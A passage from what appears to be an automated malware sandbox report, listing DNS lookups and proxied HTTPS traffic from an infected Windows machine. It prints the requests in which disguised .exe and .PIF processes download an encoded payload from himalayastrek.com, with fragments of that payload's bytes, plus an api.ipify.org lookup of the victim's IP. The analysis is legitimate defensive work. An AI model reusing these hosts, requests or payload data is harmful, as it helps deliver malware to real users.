                                                                                            Oct 30, 2024 08:35:08.528871059 CET1.1.1.1192.168.2.40x9affNo error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false
                                                                                            Oct 30, 2024 08:35:17.458328009 CET1.1.1.1192.168.2.40x66fbNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                            Oct 30, 2024 08:35:17.458328009 CET1.1.1.1192.168.2.40x66fbNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • himalayastrek.com
                                                                                            • api.ipify.org

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.44973150.116.93.1854434888C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:34:59 UTC174OUTGET /origins/233_Cllyjbrxmng HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: himalayastrek.com
                                                                                            2024-10-30 07:34:59 UTC209INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:34:59 GMT
                                                                                            Server: Apache
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Last-Modified: Wed, 30 Oct 2024 06:08:38 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 768392
                                                                                            2024-10-30 07:34:59 UTC7983INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 4f 45 69 49 54 48 53 63 6d 48 53 55 65 48 53 4d 55 44 68 59 56 49 52 30 62 45 68 6b 69 45 78 41 68 45 78 4d 65 49 52 41 67 4a 68 38 64 49 68 55 64 46 42 30 6e 44 67 34 69 45 42 6b 6d 4a 78 38 68 49 53 59 6a 45 52 79 6d 72 71 56 5a 49 36 65 78 53 30 34 5a 47 53 59 58 44 78 38 6c 47 68 73 55 70 71 36 6c 57 53 4f 6e 73 55 76 30 2b 35 6f 43 54 76 72 79 37 74 33 6b 35 70 6e 66 36 75 66 74 36 65 61 42 41 77 7a 74 35 64 33 70 2b 2f 69 57 37 4f 6a 74 33 4f 66 6d 6d 67 68 4f 33 2f 76 30 39 50 54 72 68 4f 54 79 39 4f 66 70 36 6f 35 51 42 4f 66 71 34 2b 6a 37 35 6f 33 35 2b 2f 62 6b 35 65 69 49 2f 77 66 6f 39 2b 37 7a 2b 50 4b 61 33 75 6a 79 2b 2f 76 6e 6d 2f 31 4c 2b 66 6e 75 36 4f 33 6d 69 50 44 78 33 2f 54 6f 39 59 4e 56 56 50 4c
                                                                                            Data Ascii: pq6lWSOnsUsOEiITHScmHSUeHSMUDhYVIR0bEhkiExAhExMeIRAgJh8dIhUdFB0nDg4iEBkmJx8hISYjERymrqVZI6exS04ZGSYXDx8lGhsUpq6lWSOnsUv0+5oCTvry7t3k5pnf6uft6eaBAwzt5d3p+/iW7Ojt3OfmmghO3/v09PTrhOTy9Ofp6o5QBOfq4+j75o35+/bk5eiI/wfo9+7z+PKa3ujy+/vnm/1L+fnu6O3miPDx3/To9YNVVPL
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 67 6c 73 44 36 46 56 69 57 31 6d 54 4d 71 73 70 62 37 34 68 51 38 71 68 52 62 48 55 66 74 70 62 38 69 55 6d 62 4d 59 74 71 30 62 61 39 55 53 6a 44 66 61 76 4c 64 30 4d 45 53 4a 34 31 7a 63 47 67 70 68 5a 68 36 56 72 6f 35 4e 35 58 56 74 37 33 52 69 37 73 63 4d 73 32 7a 58 38 44 36 4c 4f 70 35 66 6c 4a 57 70 4d 50 76 4d 39 54 74 48 64 7a 70 50 57 41 6b 64 69 2b 5a 4f 72 5a 48 31 73 55 74 56 51 59 6a 78 4f 42 46 48 62 34 45 2f 6c 55 2f 48 34 46 57 62 55 66 36 6a 38 78 76 32 64 42 4c 56 70 69 48 67 57 46 44 6f 4a 79 56 76 41 54 5a 51 69 4d 39 50 39 5a 79 74 42 4f 33 61 77 77 6a 57 73 34 48 37 50 66 53 50 2b 45 51 4e 79 43 35 41 32 70 2b 68 63 72 2f 2f 6a 4c 6c 46 6c 67 77 48 48 4e 51 54 4c 30 4c 35 77 59 79 32 36 41 66 6f 2f 6c 4b 6e 48 2f 42 64 2b 6d 79 71
                                                                                            Data Ascii: glsD6FViW1mTMqspb74hQ8qhRbHUftpb8iUmbMYtq0ba9USjDfavLd0MESJ41zcGgphZh6Vro5N5XVt73Ri7scMs2zX8D6LOp5flJWpMPvM9TtHdzpPWAkdi+ZOrZH1sUtVQYjxOBFHb4E/lU/H4FWbUf6j8xv2dBLVpiHgWFDoJyVvATZQiM9P9ZytBO3awwjWs4H7PfSP+EQNyC5A2p+hcr//jLlFlgwHHNQTL0L5wYy26Afo/lKnH/Bd+myq
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 6c 6b 32 70 75 71 4b 6a 69 42 59 4b 44 4c 4b 67 66 33 50 52 6f 58 41 64 35 2b 4d 46 4d 45 2f 32 64 4f 76 47 6f 6c 43 33 51 7a 4e 55 70 4f 6d 4e 73 4f 67 6a 2f 69 58 75 53 53 46 68 74 58 45 74 6a 78 36 32 63 54 36 7a 47 6d 68 6b 30 36 41 51 32 35 56 77 4e 6f 66 69 68 36 4a 4c 49 31 37 50 42 45 55 4e 7a 52 71 38 32 42 47 56 73 61 67 6e 6d 48 78 74 69 5a 57 30 74 46 78 71 4e 69 67 5a 6e 7a 79 31 74 4d 62 4f 2b 62 48 45 73 78 7a 50 71 52 62 56 4c 42 2b 69 32 31 42 4c 53 64 41 53 76 6d 52 62 6c 47 4a 70 63 36 31 43 61 5a 4c 71 38 61 54 47 57 7a 6d 75 49 48 61 6d 31 75 43 6c 72 4c 39 34 54 65 59 57 55 4c 6d 48 42 67 2f 30 2f 5a 4e 33 4b 69 79 2f 74 30 6e 37 62 75 72 68 36 66 53 46 52 70 38 52 54 59 6f 55 49 6e 61 33 79 47 72 79 59 66 57 42 5a 50 5a 39 68 57 33
                                                                                            Data Ascii: lk2puqKjiBYKDLKgf3PRoXAd5+MFME/2dOvGolC3QzNUpOmNsOgj/iXuSSFhtXEtjx62cT6zGmhk06AQ25VwNofih6JLI17PBEUNzRq82BGVsagnmHxtiZW0tFxqNigZnzy1tMbO+bHEsxzPqRbVLB+i21BLSdASvmRblGJpc61CaZLq8aTGWzmuIHam1uClrL94TeYWULmHBg/0/ZN3Kiy/t0n7burh6fSFRp8RTYoUIna3yGryYfWBZPZ9hW3
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 32 73 55 64 58 63 30 79 45 62 35 58 70 37 5a 52 53 5a 38 58 30 58 6b 6c 6e 4e 62 75 37 79 44 61 67 68 6c 72 48 61 73 6f 34 71 50 52 57 37 6c 78 4b 51 50 78 4a 73 57 4e 46 63 6c 67 47 36 6a 76 59 61 35 4a 31 67 70 57 79 59 78 66 74 37 79 46 64 4a 30 6d 4a 55 68 73 54 4e 39 2b 47 64 4a 2f 51 66 38 33 54 61 61 44 4e 70 70 68 33 73 6e 37 4a 78 50 34 41 54 51 65 63 48 48 5a 48 47 6a 49 6e 33 62 4a 45 70 37 55 76 38 62 6c 61 74 6d 73 65 2b 45 43 73 2b 59 75 73 47 48 36 4a 42 2f 6c 56 62 76 68 63 68 73 6a 63 56 7a 69 32 5a 51 56 79 56 72 71 34 68 43 66 6c 61 55 62 76 50 41 38 72 48 31 73 78 4a 4f 6c 33 45 73 53 4c 37 4e 2f 76 77 35 2b 66 79 49 4b 74 46 71 6e 39 39 46 6e 30 30 6b 4b 54 7a 44 74 2f 55 32 41 62 72 2b 53 6f 39 6a 62 74 44 32 46 71 38 72 71 69 6d 43
                                                                                            Data Ascii: 2sUdXc0yEb5Xp7ZRSZ8X0XklnNbu7yDaghlrHaso4qPRW7lxKQPxJsWNFclgG6jvYa5J1gpWyYxft7yFdJ0mJUhsTN9+GdJ/Qf83TaaDNpph3sn7JxP4ATQecHHZHGjIn3bJEp7Uv8blatmse+ECs+YusGH6JB/lVbvhchsjcVzi2ZQVyVrq4hCflaUbvPA8rH1sxJOl3EsSL7N/vw5+fyIKtFqn99Fn00kKTzDt/U2Abr+So9jbtD2Fq8rqimC
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 68 51 71 2f 44 74 70 44 54 39 2f 71 6c 44 77 5a 41 77 54 78 58 66 68 41 61 51 44 62 69 48 67 32 4b 77 75 37 38 62 76 2b 65 75 70 51 6f 67 64 4b 56 6b 30 46 50 6d 46 2f 51 55 76 34 38 52 72 30 37 5a 77 2b 6e 55 52 49 6c 4b 5a 47 49 43 73 42 35 63 6e 34 56 42 41 58 31 77 6f 78 6a 59 39 45 50 54 77 63 48 62 65 32 45 39 34 46 39 48 71 44 6b 36 6d 6b 61 44 2f 47 65 47 47 44 2f 6e 76 34 59 76 77 51 62 69 6d 66 63 43 4f 39 39 52 30 71 4e 4c 43 75 51 55 78 61 73 43 42 4c 46 74 5a 31 33 71 59 4b 52 4d 79 66 43 4b 71 42 58 35 70 30 43 44 66 79 5a 56 30 57 75 48 30 6f 6c 4b 5a 50 50 55 31 59 67 56 37 39 69 4c 66 64 2b 49 7a 77 6b 61 62 38 2f 79 69 75 46 4d 32 6d 59 44 33 51 30 64 35 49 67 47 68 32 57 6b 46 69 6b 4a 4d 58 4c 78 46 76 42 31 7a 61 4b 7a 4f 2b 58 41 33
                                                                                            Data Ascii: hQq/DtpDT9/qlDwZAwTxXfhAaQDbiHg2Kwu78bv+eupQogdKVk0FPmF/QUv48Rr07Zw+nURIlKZGICsB5cn4VBAX1woxjY9EPTwcHbe2E94F9HqDk6mkaD/GeGGD/nv4YvwQbimfcCO99R0qNLCuQUxasCBLFtZ13qYKRMyfCKqBX5p0CDfyZV0WuH0olKZPPU1YgV79iLfd+Izwkab8/yiuFM2mYD3Q0d5IgGh2WkFikJMXLxFvB1zaKzO+XA3
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 45 4a 4a 6a 7a 39 34 43 75 46 57 61 2b 35 49 6d 4b 4e 49 4d 38 2f 4e 72 31 30 70 74 6d 4e 58 33 49 4c 52 6f 6b 31 35 31 49 70 52 39 67 66 6a 5a 2f 6b 6b 79 76 4e 55 50 4d 4f 49 4c 6b 73 39 73 53 76 4a 31 58 4e 78 45 35 62 7a 6c 64 38 4b 41 69 44 77 63 69 33 4d 69 30 6d 78 42 57 38 73 4a 52 6c 2f 41 78 4a 55 51 4f 4b 5a 30 57 76 75 49 73 59 75 75 68 6e 47 53 51 33 70 36 62 51 32 68 56 62 4f 43 32 52 48 73 64 61 7a 4a 59 41 54 48 77 77 2f 4c 56 32 51 55 64 61 65 6f 31 66 65 38 4f 68 77 6c 33 6c 64 39 49 69 36 7a 52 66 59 6d 6f 43 30 34 67 66 77 56 7a 78 44 30 59 78 67 49 70 74 30 56 47 63 70 6e 42 66 35 50 78 77 35 59 44 4c 30 39 31 45 43 58 30 63 45 73 44 78 57 51 7a 67 39 50 6f 42 68 76 41 6b 73 30 78 5a 47 61 35 45 78 57 5a 71 72 51 69 48 6a 51 38 63 56
                                                                                            Data Ascii: EJJjz94CuFWa+5ImKNIM8/Nr10ptmNX3ILRok151IpR9gfjZ/kkyvNUPMOILks9sSvJ1XNxE5bzld8KAiDwci3Mi0mxBW8sJRl/AxJUQOKZ0WvuIsYuuhnGSQ3p6bQ2hVbOC2RHsdazJYATHww/LV2QUdaeo1fe8Ohwl3ld9Ii6zRfYmoC04gfwVzxD0YxgIpt0VGcpnBf5Pxw5YDL091ECX0cEsDxWQzg9PoBhvAks0xZGa5ExWZqrQiHjQ8cV
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 65 31 52 79 54 4f 6c 72 6d 57 66 61 43 6a 4a 55 56 36 44 49 2f 69 7a 69 56 52 38 4e 37 31 4c 35 59 52 2b 59 62 4b 53 79 70 6f 63 2f 63 6c 71 66 6a 6c 54 58 52 49 58 30 67 48 72 34 76 6e 5a 70 63 4b 34 72 4f 2b 31 37 63 78 4c 45 76 66 71 6d 72 36 6c 59 33 4d 76 4e 73 65 36 41 52 4b 7a 4c 4f 4d 31 76 44 46 6b 5a 4f 75 6a 35 67 51 77 52 76 6f 61 55 74 78 36 41 6f 64 53 62 70 48 6b 58 55 67 4c 43 35 79 7a 74 66 54 32 6e 47 30 7a 6a 79 4b 4f 6f 6e 64 44 7a 64 64 6e 42 66 79 39 50 58 68 57 71 54 6f 4a 7a 4d 2b 76 75 6e 5a 6a 79 75 38 51 75 37 6b 6b 4e 30 57 48 4d 56 45 33 54 65 6b 2b 41 30 48 2b 50 57 68 55 33 43 4d 33 61 76 54 2b 4e 4a 2f 6f 33 6c 64 4b 6e 52 30 39 58 4f 2b 69 62 39 41 38 58 36 46 6a 37 4c 67 4e 46 73 5a 64 61 6f 34 64 6b 36 50 37 6d 63 39 4b
                                                                                            Data Ascii: e1RyTOlrmWfaCjJUV6DI/iziVR8N71L5YR+YbKSypoc/clqfjlTXRIX0gHr4vnZpcK4rO+17cxLEvfqmr6lY3MvNse6ARKzLOM1vDFkZOuj5gQwRvoaUtx6AodSbpHkXUgLC5yztfT2nG0zjyKOondDzddnBfy9PXhWqToJzM+vunZjyu8Qu7kkN0WHMVE3Tek+A0H+PWhU3CM3avT+NJ/o3ldKnR09XO+ib9A8X6Fj7LgNFsZdao4dk6P7mc9K
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 43 6e 71 47 70 53 68 57 4c 30 41 78 6a 69 67 41 4e 4b 61 41 55 6a 35 47 63 49 46 44 34 70 65 61 68 4f 6a 70 42 4a 6f 67 38 47 78 74 61 64 64 50 49 35 53 62 73 36 38 7a 61 6a 33 67 58 62 6c 63 4f 59 75 57 4a 32 73 32 44 6b 79 4a 72 37 65 4a 32 35 62 4e 48 78 39 58 6e 66 51 2f 75 77 66 4c 4f 48 32 73 37 53 78 67 77 46 2f 31 4a 62 4b 35 35 50 6a 56 4a 53 35 4d 33 71 55 46 75 76 51 4e 4f 4e 50 67 68 4b 75 35 5a 67 74 4f 38 4f 44 79 66 78 35 63 73 2b 32 45 33 45 50 47 31 6e 30 37 2b 6b 47 71 55 70 5a 45 46 46 68 61 73 4e 79 43 63 45 4d 77 43 58 38 41 39 68 33 61 54 73 73 56 39 68 30 53 62 5a 32 58 69 5a 4c 64 34 73 74 79 6d 68 33 64 33 68 52 64 51 36 77 54 4f 67 2b 6d 44 61 6a 75 6c 4f 57 4e 79 44 43 36 79 53 36 68 54 67 72 67 62 58 56 30 7a 73 53 43 4b 45 32
                                                                                            Data Ascii: CnqGpShWL0AxjigANKaAUj5GcIFD4peahOjpBJog8GxtaddPI5Sbs68zaj3gXblcOYuWJ2s2DkyJr7eJ25bNHx9XnfQ/uwfLOH2s7SxgwF/1JbK55PjVJS5M3qUFuvQNONPghKu5ZgtO8ODyfx5cs+2E3EPG1n07+kGqUpZEFFhasNyCcEMwCX8A9h3aTssV9h0SbZ2XiZLd4stymh3d3hRdQ6wTOg+mDajulOWNyDC6yS6hTgrgbXV0zsSCKE2
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 41 70 76 62 61 4b 6e 70 51 4b 50 79 71 44 51 71 66 67 79 79 5a 39 4d 58 42 39 6c 33 6a 48 6b 66 37 4d 70 37 6b 4a 71 63 64 72 62 76 79 4d 32 2b 2b 49 54 71 67 64 68 75 76 50 72 32 59 6b 51 34 46 65 74 4c 41 44 31 6d 4f 31 65 69 4c 35 48 6a 57 5a 69 55 36 55 6b 50 58 61 53 2f 57 33 53 2b 39 31 67 4d 43 50 77 76 2b 51 4a 33 43 4c 31 6b 6a 67 32 4b 35 77 72 36 50 79 61 39 65 35 55 48 74 32 4b 75 32 70 42 49 4e 4d 46 2f 72 4b 42 32 74 69 50 4d 39 6b 68 6b 43 6f 48 6c 2f 67 57 47 4d 55 64 4c 70 61 39 4c 34 50 72 5a 64 62 56 64 78 52 52 77 78 57 43 51 70 4e 67 38 66 5a 39 64 43 6c 66 61 39 75 4f 33 57 58 32 4d 6a 6a 4c 70 6d 73 61 6f 43 43 6f 46 33 53 70 70 45 44 58 76 4a 6e 6f 6c 64 7a 41 2b 30 72 56 63 68 75 4a 53 44 68 39 54 6b 6f 55 68 78 37 72 44 67 57 53
                                                                                            Data Ascii: ApvbaKnpQKPyqDQqfgyyZ9MXB9l3jHkf7Mp7kJqcdrbvyM2++ITqgdhuvPr2YkQ4FetLAD1mO1eiL5HjWZiU6UkPXaS/W3S+91gMCPwv+QJ3CL1kjg2K5wr6Pya9e5UHt2Ku2pBINMF/rKB2tiPM9khkCoHl/gWGMUdLpa9L4PrZdbVdxRRwxWCQpNg8fZ9dClfa9uO3WX2MjjLpmsaoCCoF3SppEDXvJnoldzA+0rVchuJSDh9TkoUhx7rDgWS
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 69 77 38 72 36 48 2f 78 39 44 4f 62 67 6e 73 53 6d 34 79 4b 36 4e 63 4f 6b 36 66 76 4a 46 56 4e 34 7a 41 68 50 2f 4f 4a 6f 69 7a 34 68 2f 4a 54 31 6b 71 53 7a 31 48 61 75 63 41 65 70 53 68 52 2f 53 71 37 49 6f 2b 48 54 43 72 76 55 59 4b 6c 48 5a 53 47 45 6d 65 66 32 6a 70 46 44 61 41 52 58 48 66 41 6d 68 7a 37 6a 59 76 54 54 67 48 44 41 64 53 4c 65 52 69 32 34 56 4f 63 44 74 46 72 6f 4c 46 50 52 39 32 4f 72 71 66 51 6c 77 4f 42 4f 34 78 39 57 51 76 42 62 4e 37 2f 54 4e 7a 72 50 6b 2f 71 33 31 34 6e 69 57 56 77 53 7a 36 49 67 31 45 70 6d 2b 31 44 58 54 33 53 50 47 2b 70 46 76 50 65 48 74 38 48 5a 73 2b 66 6a 6e 6a 2f 4a 67 78 6e 4f 72 55 67 49 53 65 43 78 44 55 38 70 71 70 48 43 75 78 49 49 52 69 42 35 42 78 32 73 46 64 33 78 78 69 67 78 56 41 32 38 31 64
                                                                                            Data Ascii: iw8r6H/x9DObgnsSm4yK6NcOk6fvJFVN4zAhP/OJoiz4h/JT1kqSz1HaucAepShR/Sq7Io+HTCrvUYKlHZSGEmef2jpFDaARXHfAmhz7jYvTTgHDAdSLeRi24VOcDtFroLFPR92OrqfQlwOBO4x9WQvBbN7/TNzrPk/q314niWVwSz6Ig1Epm+1DXT3SPG+pFvPeHt8HZs+fjnj/JgxnOrUgISeCxDU8pqpHCuxIIRiB5Bx2sFd3xxigxVA281d


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449732172.67.74.1524434544C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:35:06 UTC155OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-30 07:35:07 UTC211INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:35:06 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 14
                                                                                            Connection: close
                                                                                            Vary: Origin
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8da9ba0c2d872e24-DFW
                                                                                            2024-10-30 07:35:07 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38
                                                                                            Data Ascii: 173.254.250.78


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.44973750.116.93.1854431440C:\Users\Public\Libraries\Cllyjbrx.PIF
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:35:12 UTC174OUTGET /origins/233_Cllyjbrxmng HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: himalayastrek.com
                                                                                            2024-10-30 07:35:12 UTC209INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:35:12 GMT
                                                                                            Server: Apache
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Last-Modified: Wed, 30 Oct 2024 06:08:38 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 768392
                                                                                            2024-10-30 07:35:12 UTC7983INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 4f 45 69 49 54 48 53 63 6d 48 53 55 65 48 53 4d 55 44 68 59 56 49 52 30 62 45 68 6b 69 45 78 41 68 45 78 4d 65 49 52 41 67 4a 68 38 64 49 68 55 64 46 42 30 6e 44 67 34 69 45 42 6b 6d 4a 78 38 68 49 53 59 6a 45 52 79 6d 72 71 56 5a 49 36 65 78 53 30 34 5a 47 53 59 58 44 78 38 6c 47 68 73 55 70 71 36 6c 57 53 4f 6e 73 55 76 30 2b 35 6f 43 54 76 72 79 37 74 33 6b 35 70 6e 66 36 75 66 74 36 65 61 42 41 77 7a 74 35 64 33 70 2b 2f 69 57 37 4f 6a 74 33 4f 66 6d 6d 67 68 4f 33 2f 76 30 39 50 54 72 68 4f 54 79 39 4f 66 70 36 6f 35 51 42 4f 66 71 34 2b 6a 37 35 6f 33 35 2b 2f 62 6b 35 65 69 49 2f 77 66 6f 39 2b 37 7a 2b 50 4b 61 33 75 6a 79 2b 2f 76 6e 6d 2f 31 4c 2b 66 6e 75 36 4f 33 6d 69 50 44 78 33 2f 54 6f 39 59 4e 56 56 50 4c
                                                                                            Data Ascii: pq6lWSOnsUsOEiITHScmHSUeHSMUDhYVIR0bEhkiExAhExMeIRAgJh8dIhUdFB0nDg4iEBkmJx8hISYjERymrqVZI6exS04ZGSYXDx8lGhsUpq6lWSOnsUv0+5oCTvry7t3k5pnf6uft6eaBAwzt5d3p+/iW7Ojt3OfmmghO3/v09PTrhOTy9Ofp6o5QBOfq4+j75o35+/bk5eiI/wfo9+7z+PKa3ujy+/vnm/1L+fnu6O3miPDx3/To9YNVVPL
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 67 6c 73 44 36 46 56 69 57 31 6d 54 4d 71 73 70 62 37 34 68 51 38 71 68 52 62 48 55 66 74 70 62 38 69 55 6d 62 4d 59 74 71 30 62 61 39 55 53 6a 44 66 61 76 4c 64 30 4d 45 53 4a 34 31 7a 63 47 67 70 68 5a 68 36 56 72 6f 35 4e 35 58 56 74 37 33 52 69 37 73 63 4d 73 32 7a 58 38 44 36 4c 4f 70 35 66 6c 4a 57 70 4d 50 76 4d 39 54 74 48 64 7a 70 50 57 41 6b 64 69 2b 5a 4f 72 5a 48 31 73 55 74 56 51 59 6a 78 4f 42 46 48 62 34 45 2f 6c 55 2f 48 34 46 57 62 55 66 36 6a 38 78 76 32 64 42 4c 56 70 69 48 67 57 46 44 6f 4a 79 56 76 41 54 5a 51 69 4d 39 50 39 5a 79 74 42 4f 33 61 77 77 6a 57 73 34 48 37 50 66 53 50 2b 45 51 4e 79 43 35 41 32 70 2b 68 63 72 2f 2f 6a 4c 6c 46 6c 67 77 48 48 4e 51 54 4c 30 4c 35 77 59 79 32 36 41 66 6f 2f 6c 4b 6e 48 2f 42 64 2b 6d 79 71
                                                                                            Data Ascii: glsD6FViW1mTMqspb74hQ8qhRbHUftpb8iUmbMYtq0ba9USjDfavLd0MESJ41zcGgphZh6Vro5N5XVt73Ri7scMs2zX8D6LOp5flJWpMPvM9TtHdzpPWAkdi+ZOrZH1sUtVQYjxOBFHb4E/lU/H4FWbUf6j8xv2dBLVpiHgWFDoJyVvATZQiM9P9ZytBO3awwjWs4H7PfSP+EQNyC5A2p+hcr//jLlFlgwHHNQTL0L5wYy26Afo/lKnH/Bd+myq
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 6c 6b 32 70 75 71 4b 6a 69 42 59 4b 44 4c 4b 67 66 33 50 52 6f 58 41 64 35 2b 4d 46 4d 45 2f 32 64 4f 76 47 6f 6c 43 33 51 7a 4e 55 70 4f 6d 4e 73 4f 67 6a 2f 69 58 75 53 53 46 68 74 58 45 74 6a 78 36 32 63 54 36 7a 47 6d 68 6b 30 36 41 51 32 35 56 77 4e 6f 66 69 68 36 4a 4c 49 31 37 50 42 45 55 4e 7a 52 71 38 32 42 47 56 73 61 67 6e 6d 48 78 74 69 5a 57 30 74 46 78 71 4e 69 67 5a 6e 7a 79 31 74 4d 62 4f 2b 62 48 45 73 78 7a 50 71 52 62 56 4c 42 2b 69 32 31 42 4c 53 64 41 53 76 6d 52 62 6c 47 4a 70 63 36 31 43 61 5a 4c 71 38 61 54 47 57 7a 6d 75 49 48 61 6d 31 75 43 6c 72 4c 39 34 54 65 59 57 55 4c 6d 48 42 67 2f 30 2f 5a 4e 33 4b 69 79 2f 74 30 6e 37 62 75 72 68 36 66 53 46 52 70 38 52 54 59 6f 55 49 6e 61 33 79 47 72 79 59 66 57 42 5a 50 5a 39 68 57 33
                                                                                            Data Ascii: lk2puqKjiBYKDLKgf3PRoXAd5+MFME/2dOvGolC3QzNUpOmNsOgj/iXuSSFhtXEtjx62cT6zGmhk06AQ25VwNofih6JLI17PBEUNzRq82BGVsagnmHxtiZW0tFxqNigZnzy1tMbO+bHEsxzPqRbVLB+i21BLSdASvmRblGJpc61CaZLq8aTGWzmuIHam1uClrL94TeYWULmHBg/0/ZN3Kiy/t0n7burh6fSFRp8RTYoUIna3yGryYfWBZPZ9hW3
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 32 73 55 64 58 63 30 79 45 62 35 58 70 37 5a 52 53 5a 38 58 30 58 6b 6c 6e 4e 62 75 37 79 44 61 67 68 6c 72 48 61 73 6f 34 71 50 52 57 37 6c 78 4b 51 50 78 4a 73 57 4e 46 63 6c 67 47 36 6a 76 59 61 35 4a 31 67 70 57 79 59 78 66 74 37 79 46 64 4a 30 6d 4a 55 68 73 54 4e 39 2b 47 64 4a 2f 51 66 38 33 54 61 61 44 4e 70 70 68 33 73 6e 37 4a 78 50 34 41 54 51 65 63 48 48 5a 48 47 6a 49 6e 33 62 4a 45 70 37 55 76 38 62 6c 61 74 6d 73 65 2b 45 43 73 2b 59 75 73 47 48 36 4a 42 2f 6c 56 62 76 68 63 68 73 6a 63 56 7a 69 32 5a 51 56 79 56 72 71 34 68 43 66 6c 61 55 62 76 50 41 38 72 48 31 73 78 4a 4f 6c 33 45 73 53 4c 37 4e 2f 76 77 35 2b 66 79 49 4b 74 46 71 6e 39 39 46 6e 30 30 6b 4b 54 7a 44 74 2f 55 32 41 62 72 2b 53 6f 39 6a 62 74 44 32 46 71 38 72 71 69 6d 43
                                                                                            Data Ascii: 2sUdXc0yEb5Xp7ZRSZ8X0XklnNbu7yDaghlrHaso4qPRW7lxKQPxJsWNFclgG6jvYa5J1gpWyYxft7yFdJ0mJUhsTN9+GdJ/Qf83TaaDNpph3sn7JxP4ATQecHHZHGjIn3bJEp7Uv8blatmse+ECs+YusGH6JB/lVbvhchsjcVzi2ZQVyVrq4hCflaUbvPA8rH1sxJOl3EsSL7N/vw5+fyIKtFqn99Fn00kKTzDt/U2Abr+So9jbtD2Fq8rqimC
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 68 51 71 2f 44 74 70 44 54 39 2f 71 6c 44 77 5a 41 77 54 78 58 66 68 41 61 51 44 62 69 48 67 32 4b 77 75 37 38 62 76 2b 65 75 70 51 6f 67 64 4b 56 6b 30 46 50 6d 46 2f 51 55 76 34 38 52 72 30 37 5a 77 2b 6e 55 52 49 6c 4b 5a 47 49 43 73 42 35 63 6e 34 56 42 41 58 31 77 6f 78 6a 59 39 45 50 54 77 63 48 62 65 32 45 39 34 46 39 48 71 44 6b 36 6d 6b 61 44 2f 47 65 47 47 44 2f 6e 76 34 59 76 77 51 62 69 6d 66 63 43 4f 39 39 52 30 71 4e 4c 43 75 51 55 78 61 73 43 42 4c 46 74 5a 31 33 71 59 4b 52 4d 79 66 43 4b 71 42 58 35 70 30 43 44 66 79 5a 56 30 57 75 48 30 6f 6c 4b 5a 50 50 55 31 59 67 56 37 39 69 4c 66 64 2b 49 7a 77 6b 61 62 38 2f 79 69 75 46 4d 32 6d 59 44 33 51 30 64 35 49 67 47 68 32 57 6b 46 69 6b 4a 4d 58 4c 78 46 76 42 31 7a 61 4b 7a 4f 2b 58 41 33
                                                                                            Data Ascii: hQq/DtpDT9/qlDwZAwTxXfhAaQDbiHg2Kwu78bv+eupQogdKVk0FPmF/QUv48Rr07Zw+nURIlKZGICsB5cn4VBAX1woxjY9EPTwcHbe2E94F9HqDk6mkaD/GeGGD/nv4YvwQbimfcCO99R0qNLCuQUxasCBLFtZ13qYKRMyfCKqBX5p0CDfyZV0WuH0olKZPPU1YgV79iLfd+Izwkab8/yiuFM2mYD3Q0d5IgGh2WkFikJMXLxFvB1zaKzO+XA3
